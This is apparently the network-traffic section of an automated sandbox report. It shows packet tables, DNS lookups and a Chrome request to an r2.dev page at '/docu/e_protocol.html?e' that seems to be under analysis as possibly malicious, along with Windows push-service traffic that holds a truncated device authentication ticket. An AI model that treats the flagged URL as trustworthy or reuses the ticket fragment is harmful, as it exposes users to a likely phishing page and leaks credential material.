Jan 14, 2025 01:39:00.768311977 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.768345118 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.768347025 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.768392086 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.768399000 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.768435001 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.769529104 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.769571066 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.769576073 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.769587040 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.769618988 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.769619942 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.769629002 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.769634008 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.769653082 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.769676924 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.769709110 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.769716024 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.769721985 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.769757032 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.769989014 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.770030975 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.770128965 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.770170927 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.770315886 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.770351887 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.853254080 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.882541895 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.882631063 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.882991076 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.883030891 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.883074999 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.883089066 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.883117914 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.883121014 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.883158922 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.883167028 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.883183002 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.883212090 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.883219004 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.883299112 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:00.883341074 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.938819885 CET	49724	443	192.168.2.6	162.159.140.237
Jan 14, 2025 01:39:00.938852072 CET	443	49724	162.159.140.237	192.168.2.6
Jan 14, 2025 01:39:01.102530956 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:01.102571964 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:01.102763891 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:01.103051901 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:01.103060007 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:01.901856899 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:01.902141094 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:01.902156115 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:01.903436899 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:01.903562069 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:01.905529976 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:01.905595064 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:01.906250954 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:01.906260014 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:01.952696085 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.073786020 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.073887110 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.073908091 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.073945999 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.073967934 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.073982000 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.074146032 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.074198961 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.074672937 CET	49736	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.074690104 CET	443	49736	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.212330103 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.212356091 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.212471962 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.212713003 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.212723017 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.986443996 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.988612890 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.988636017 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.992248058 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.992311001 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.994620085 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.994791031 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:02.995896101 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:02.995903015 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:03.045686960 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:03.159858942 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:03.159881115 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:03.159888029 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:03.159929037 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:03.159949064 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:03.159981012 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:03.160027027 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:03.166636944 CET	49744	443	192.168.2.6	95.154.228.177
Jan 14, 2025 01:39:03.166656971 CET	443	49744	95.154.228.177	192.168.2.6
Jan 14, 2025 01:39:08.340894938 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:39:08.341051102 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:39:08.341443062 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:39:09.547353029 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:39:09.547389030 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:39:14.592623949 CET	80	49723	172.66.0.235	192.168.2.6
Jan 14, 2025 01:39:14.592688084 CET	49723	80	192.168.2.6	172.66.0.235
Jan 14, 2025 01:39:15.539702892 CET	49723	80	192.168.2.6	172.66.0.235
Jan 14, 2025 01:39:15.544595003 CET	80	49723	172.66.0.235	192.168.2.6
Jan 14, 2025 01:39:20.333868980 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:20.333955050 CET	443	49863	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:20.334196091 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:20.335423946 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:20.335462093 CET	443	49863	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:21.134234905 CET	443	49863	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:21.134320974 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:21.140422106 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:21.140460968 CET	443	49863	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:21.140769005 CET	443	49863	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:21.142824888 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:21.142889977 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:21.142905951 CET	443	49863	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:21.143059969 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:21.183334112 CET	443	49863	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:21.315243959 CET	443	49863	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:21.315494061 CET	443	49863	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:21.315589905 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:21.315685987 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:21.315732002 CET	443	49863	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:21.315759897 CET	49863	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:44.690567017 CET	49722	80	192.168.2.6	172.66.0.235
Jan 14, 2025 01:39:44.695517063 CET	80	49722	172.66.0.235	192.168.2.6
Jan 14, 2025 01:39:46.313860893 CET	50003	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:46.313914061 CET	443	50003	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:46.313982010 CET	50003	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:46.314517021 CET	50003	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:46.314533949 CET	443	50003	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:47.126523018 CET	443	50003	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:47.126647949 CET	50003	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:47.128293991 CET	50003	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:47.128309011 CET	443	50003	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:47.128515005 CET	443	50003	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:47.130378008 CET	50003	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:47.130434990 CET	50003	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:47.130439997 CET	443	50003	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:47.130565882 CET	50003	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:47.175333977 CET	443	50003	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:47.304569960 CET	443	50003	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:47.304646015 CET	443	50003	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:47.304702044 CET	50003	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:47.304811954 CET	50003	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:39:47.304831982 CET	443	50003	40.113.103.199	192.168.2.6
Jan 14, 2025 01:39:57.747101068 CET	50005	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:39:57.747145891 CET	443	50005	216.58.206.36	192.168.2.6
Jan 14, 2025 01:39:57.747226954 CET	50005	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:39:57.747445107 CET	50005	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:39:57.747456074 CET	443	50005	216.58.206.36	192.168.2.6
Jan 14, 2025 01:39:58.378707886 CET	443	50005	216.58.206.36	192.168.2.6
Jan 14, 2025 01:39:58.379041910 CET	50005	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:39:58.379067898 CET	443	50005	216.58.206.36	192.168.2.6
Jan 14, 2025 01:39:58.379570961 CET	443	50005	216.58.206.36	192.168.2.6
Jan 14, 2025 01:39:58.379919052 CET	50005	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:39:58.380006075 CET	443	50005	216.58.206.36	192.168.2.6
Jan 14, 2025 01:39:58.427110910 CET	50005	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:40:08.294431925 CET	443	50005	216.58.206.36	192.168.2.6
Jan 14, 2025 01:40:08.294542074 CET	443	50005	216.58.206.36	192.168.2.6
Jan 14, 2025 01:40:08.294620991 CET	50005	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:40:09.535504103 CET	50005	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:40:09.535573006 CET	443	50005	216.58.206.36	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 01:38:53.334866047 CET	53	60608	1.1.1.1	192.168.2.6
Jan 14, 2025 01:38:53.395366907 CET	53	58454	1.1.1.1	192.168.2.6
Jan 14, 2025 01:38:54.386358976 CET	53	63429	1.1.1.1	192.168.2.6
Jan 14, 2025 01:38:57.687529087 CET	58068	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:38:57.688055038 CET	51159	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:38:57.694250107 CET	53	58068	1.1.1.1	192.168.2.6
Jan 14, 2025 01:38:57.694706917 CET	53	51159	1.1.1.1	192.168.2.6
Jan 14, 2025 01:38:59.214184999 CET	63383	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:38:59.217519045 CET	51919	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:38:59.223161936 CET	53	63383	1.1.1.1	192.168.2.6
Jan 14, 2025 01:38:59.227411032 CET	53	51919	1.1.1.1	192.168.2.6
Jan 14, 2025 01:38:59.690651894 CET	57440	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:38:59.690828085 CET	54910	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:38:59.698865891 CET	53	57440	1.1.1.1	192.168.2.6
Jan 14, 2025 01:38:59.699760914 CET	53	54910	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:00.946774960 CET	52665	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:39:00.947293997 CET	53046	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:39:00.955281973 CET	53	55054	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:01.066140890 CET	53	52665	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:01.162147999 CET	53	53046	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:02.085057020 CET	59850	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:39:02.085448027 CET	53656	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:39:02.181819916 CET	53	52670	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:02.197593927 CET	53	53656	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:02.207544088 CET	53	61275	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:02.211694956 CET	53	59850	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:11.365926027 CET	53	53092	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:30.417170048 CET	53	58549	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:52.884984970 CET	53	61525	1.1.1.1	192.168.2.6
Jan 14, 2025 01:39:52.888686895 CET	53	55229	1.1.1.1	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 14, 2025 01:39:01.162216902 CET	192.168.2.6	1.1.1.1	c231	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 01:38:57.687529087 CET	192.168.2.6	1.1.1.1	0x7a9f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:38:57.688055038 CET	192.168.2.6	1.1.1.1	0x26b	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 14, 2025 01:38:59.214184999 CET	192.168.2.6	1.1.1.1	0x7d11	Standard query (0)	pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:38:59.217519045 CET	192.168.2.6	1.1.1.1	0xd69c	Standard query (0)	pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev	65	IN (0x0001)	false
Jan 14, 2025 01:38:59.690651894 CET	192.168.2.6	1.1.1.1	0xe411	Standard query (0)	pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:38:59.690828085 CET	192.168.2.6	1.1.1.1	0x2d26	Standard query (0)	pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev	65	IN (0x0001)	false
Jan 14, 2025 01:39:00.946774960 CET	192.168.2.6	1.1.1.1	0x9edf	Standard query (0)	www.continentalsports.co.uk	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:39:00.947293997 CET	192.168.2.6	1.1.1.1	0xae7e	Standard query (0)	www.continentalsports.co.uk	65	IN (0x0001)	false
Jan 14, 2025 01:39:02.085057020 CET	192.168.2.6	1.1.1.1	0xa77d	Standard query (0)	www.continentalsports.co.uk	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:39:02.085448027 CET	192.168.2.6	1.1.1.1	0xe3	Standard query (0)	www.continentalsports.co.uk	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 01:38:57.694250107 CET	1.1.1.1	192.168.2.6	0x7a9f	No error (0)	www.google.com	216.58.206.36	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:38:57.694706917 CET	1.1.1.1	192.168.2.6	0x26b	No error (0)	www.google.com		65	IN (0x0001)	false
Jan 14, 2025 01:38:59.223161936 CET	1.1.1.1	192.168.2.6	0x7d11	No error (0)	pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev	172.66.0.235	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:38:59.223161936 CET	1.1.1.1	192.168.2.6	0x7d11	No error (0)	pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev	162.159.140.237	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:38:59.698865891 CET	1.1.1.1	192.168.2.6	0xe411	No error (0)	pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev	162.159.140.237	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:38:59.698865891 CET	1.1.1.1	192.168.2.6	0xe411	No error (0)	pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev	172.66.0.235	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:39:01.066140890 CET	1.1.1.1	192.168.2.6	0x9edf	No error (0)	www.continentalsports.co.uk	95.154.228.177	A (IP address)	IN (0x0001)	false
Jan 14, 2025 01:39:02.211694956 CET	1.1.1.1	192.168.2.6	0xa77d	No error (0)	www.continentalsports.co.uk	95.154.228.177	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev

www.continentalsports.co.uk

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49722	172.66.0.235	80	1060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 01:38:59.233530998 CET	480	OUT	GET /docu/e_protocol.html?e HTTP/1.1 Host: pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 14, 2025 01:38:59.687655926 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 14 Jan 2025 00:38:59 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Tue, 14 Jan 2025 01:38:59 GMT Location: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e Vary: Accept-Encoding Server: cloudflare CF-RAY: 901990feb9f5440e-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jan 14, 2025 01:39:44.690567017 CET	6	OUT	Data Raw: 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49708	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:38:53 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 46 55 34 6e 2f 6c 67 6d 6f 30 75 44 4e 75 72 37 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 66 62 31 66 33 36 61 36 66 32 31 65 33 36 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: FU4n/lgmo0uDNur7.1Context: efb1f36a6f21e367
2025-01-14 00:38:53 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:38:53 UTC	1076	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 46 55 34 6e 2f 6c 67 6d 6f 30 75 44 4e 75 72 37 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 66 62 31 66 33 36 61 36 66 32 31 65 33 36 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: FU4n/lgmo0uDNur7.2Context: efb1f36a6f21e367<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
2025-01-14 00:38:53 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 46 55 34 6e 2f 6c 67 6d 6f 30 75 44 4e 75 72 37 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 66 62 31 66 33 36 61 36 66 32 31 65 33 36 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: FU4n/lgmo0uDNur7.3Context: efb1f36a6f21e367<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 00:38:53 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:38:53 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 61 65 47 46 52 74 35 52 65 55 79 6b 70 58 73 43 44 6b 76 69 45 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: aeGFRt5ReUykpXsCDkviEA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49716	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:38:56 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6b 6a 2b 74 33 63 53 45 30 45 6d 6e 34 71 43 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 61 61 31 31 32 37 38 31 30 62 31 62 63 34 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: kj+t3cSE0Emn4qCx.1Context: 8aa1127810b1bc4f
